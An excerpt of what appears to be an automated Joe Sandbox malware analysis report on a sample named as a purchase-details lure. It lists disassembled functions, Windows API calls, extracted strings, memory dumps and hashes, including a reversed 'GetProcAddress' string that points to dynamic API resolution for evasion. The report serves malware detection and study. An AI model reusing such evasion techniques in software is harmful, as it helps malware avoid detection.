                                                                                                                                                                                                                          • Opcode ID: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
                                                                                                                                                                                                                          • Instruction ID: ab797fb8c09b08b16e4b5de84b03299ad6174d89a9e79b7915815f80c00cded5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C4180E3AA830A5B52086B6EB500427FBDED345B503E046DBF884CB384DD74FC518A6E
                                                                                                                                                                                                                          Function 02B26ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B26EDE
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B26EEF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B26EFF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B26F0F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B26F1F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B26F2F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B26F3F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                                                          • API String ID: 667068680-2233174745
                                                                                                                                                                                                                          • Opcode ID: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
                                                                                                                                                                                                                          • Instruction ID: a25fb6b2bde3ef0bcc12d3f4fc15160cb17dd42138a1a575ed5fffbaa3f07075
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F050F0A8A351BDBF00FB745CC18AA375DAF246443401CD6F91B56556FB75D8188F10
                                                                                                                                                                                                                          Function 02B12530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B128CE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                                                                          • API String ID: 2030045667-32948583
                                                                                                                                                                                                                          • Opcode ID: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
                                                                                                                                                                                                                          • Instruction ID: 5507c5600d56c3f15398d43084f1c377e7a5ebc66945d8ed52f2b813e81388f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04A1D230A042B88BDF21AA2CCC84B99B7E5EF09350F9441F5ED49AB386CB7599C5CF51
                                                                                                                                                                                                                          Function 02B1252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • 7, xrefs: 02B126A1
                                                                                                                                                                                                                          • An unexpected memory leak has occurred. , xrefs: 02B12690
                                                                                                                                                                                                                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B12849
                                                                                                                                                                                                                          • The unexpected small block leaks are:, xrefs: 02B12707
                                                                                                                                                                                                                          • , xrefs: 02B12814
                                                                                                                                                                                                                          • Unexpected Memory Leak, xrefs: 02B128C0
                                                                                                                                                                                                                          • bytes: , xrefs: 02B1275D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                                                                          • API String ID: 0-2723507874
                                                                                                                                                                                                                          • Opcode ID: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
                                                                                                                                                                                                                          • Instruction ID: bae71f51e1f4e8534cbb57ed49cab5ffccd1a85b2b893d872a0a95acdb38912b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C571B130A042B88FDF21EA2CCC84BD9BAE5EF09744F9041E5D949EB285DB758AC5CF51
                                                                                                                                                                                                                          Function 02B1BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1BDF6
                                                                                                                                                                                                                            • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                                                                                                                                          • Opcode ID: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
                                                                                                                                                                                                                          • Instruction ID: d14148c337e30014d83076611864d3586be67db5fcd1728b496b6ca07752be80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA612135B401489BDB00EBA4D894B9F7BBBDF88700FD098F6E1019B645DA39EA06DF51
                                                                                                                                                                                                                          Function 02B2AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B000
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B2B017
                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B0AB
                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B2B0B7
                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B2B0CB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Read$HandleModule
                                                                                                                                                                                                                          • String ID: KernelBase$LoadLibraryExA
                                                                                                                                                                                                                          • API String ID: 2226866862-113032527
                                                                                                                                                                                                                          • Opcode ID: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
                                                                                                                                                                                                                          • Instruction ID: f155cd0650f8b316ac0a53285981359ab5518f0d306c32bfe56e2cbf3bc9e26f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60317671A40315BBDB21DB68CC85F9E77A8FF05358F044691FA68D72C1DB34A948CBA4
                                                                                                                                                                                                                          Function 02B1435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B14395
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B1439B
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8), ref: 02B143B0
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?), ref: 02B143B6
                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B143D4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                          • Opcode ID: cea0da9495ffe2cee9e62574b311271e22c32437dfbb118a1ebc825fb3201102
                                                                                                                                                                                                                          • Instruction ID: bef5d682c9f2e70c7491bc5fa255f4bb0a3e19e2733ebf28f773ca4da8d8f5ac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cea0da9495ffe2cee9e62574b311271e22c32437dfbb118a1ebc825fb3201102
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1F02470AE4344B5FB10A2A47D46F59737C9B04F61FD08AE6F364A60D087F080D58B22
                                                                                                                                                                                                                          Function 02B1AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B1AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                                                                                                                            • Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                                                                                                                            • Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                                                                                                                            • Part of subcall function 02B1AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 02B1AEFB
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF18
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF1E
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF33
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF39
                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B1AF5B
                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B1AF71
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 185507032-0
                                                                                                                                                                                                                          • Opcode ID: c1956d04ce415b48ca40b9995400291ce6f2dc11074df42446f64bc6b1b1ee83
                                                                                                                                                                                                                          • Instruction ID: cd67eec1a3a1098d4bf84476c16d8bbd776bc182aef4047e66fea2fae9599612
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1956d04ce415b48ca40b9995400291ce6f2dc11074df42446f64bc6b1b1ee83
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C1157B2949200BEE200FBA4CD84F9B77EDAF44700FC04AA5BB44D70E0DA75E9048B62
                                                                                                                                                                                                                          Function 02B1E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E625
                                                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E641
                                                                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B1E67A
                                                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E6F7
                                                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B1E710
                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 02B1E745
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 351091851-0
                                                                                                                                                                                                                          • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                                                          • Instruction ID: a3cc6e153ce983e7b2c7c9f98c5c4049d16f7b45067a4cf59daf37eb1b059021
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F351F8759012299BCB26DB58CC84BD9B3BDAF49300F8045E5EA08E7211DB34EF858FA5
                                                                                                                                                                                                                          Function 02B13598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135BA
                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B135ED
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,02B13610,00000000,?,00000004,00000000,02B13609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B13603
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                                                                                                                          • Opcode ID: 7a4199660225e6d192260c5b2933bcfd77c09450245ddb29fc1b7a68b430ed62
                                                                                                                                                                                                                          • Instruction ID: 1c8feb75da51fdae4d5dbbc4daf5c7511bdc75fdfd5cd9d1bc68a892e1d899d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a4199660225e6d192260c5b2933bcfd77c09450245ddb29fc1b7a68b430ed62
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C01B575A54218BAEB11DF908D02BBD77ECDB08B00F9005E2BA04D7680F6B4A610CA59
                                                                                                                                                                                                                          Function 02B28274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: Kernel32$sserddAcorPteG
                                                                                                                                                                                                                          • API String ID: 667068680-1372893251
                                                                                                                                                                                                                          • Opcode ID: 56a3bccbbfef41f93ee2f5fb767c26ee062542e698b132604680a639d86f7116
                                                                                                                                                                                                                          • Instruction ID: fefa0f00f46704f3d8e6587eaa5a468e34159a77987ba8ebfc0d3ee2de320403
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a3bccbbfef41f93ee2f5fb767c26ee062542e698b132604680a639d86f7116
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 200162B5654304AFEB00EBA4DD41E9EB7FEEB48B10FA1C4E0F904D7604DA70A905DA28
                                                                                                                                                                                                                          Function 02B1AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA68
                                                                                                                                                                                                                            • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B1AAE7,?,?,00000000), ref: 02B1AA98
                                                                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02B1AAA3
                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B1AAE7,?,?,00000000), ref: 02B1AAC1
                                                                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02B1AACC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
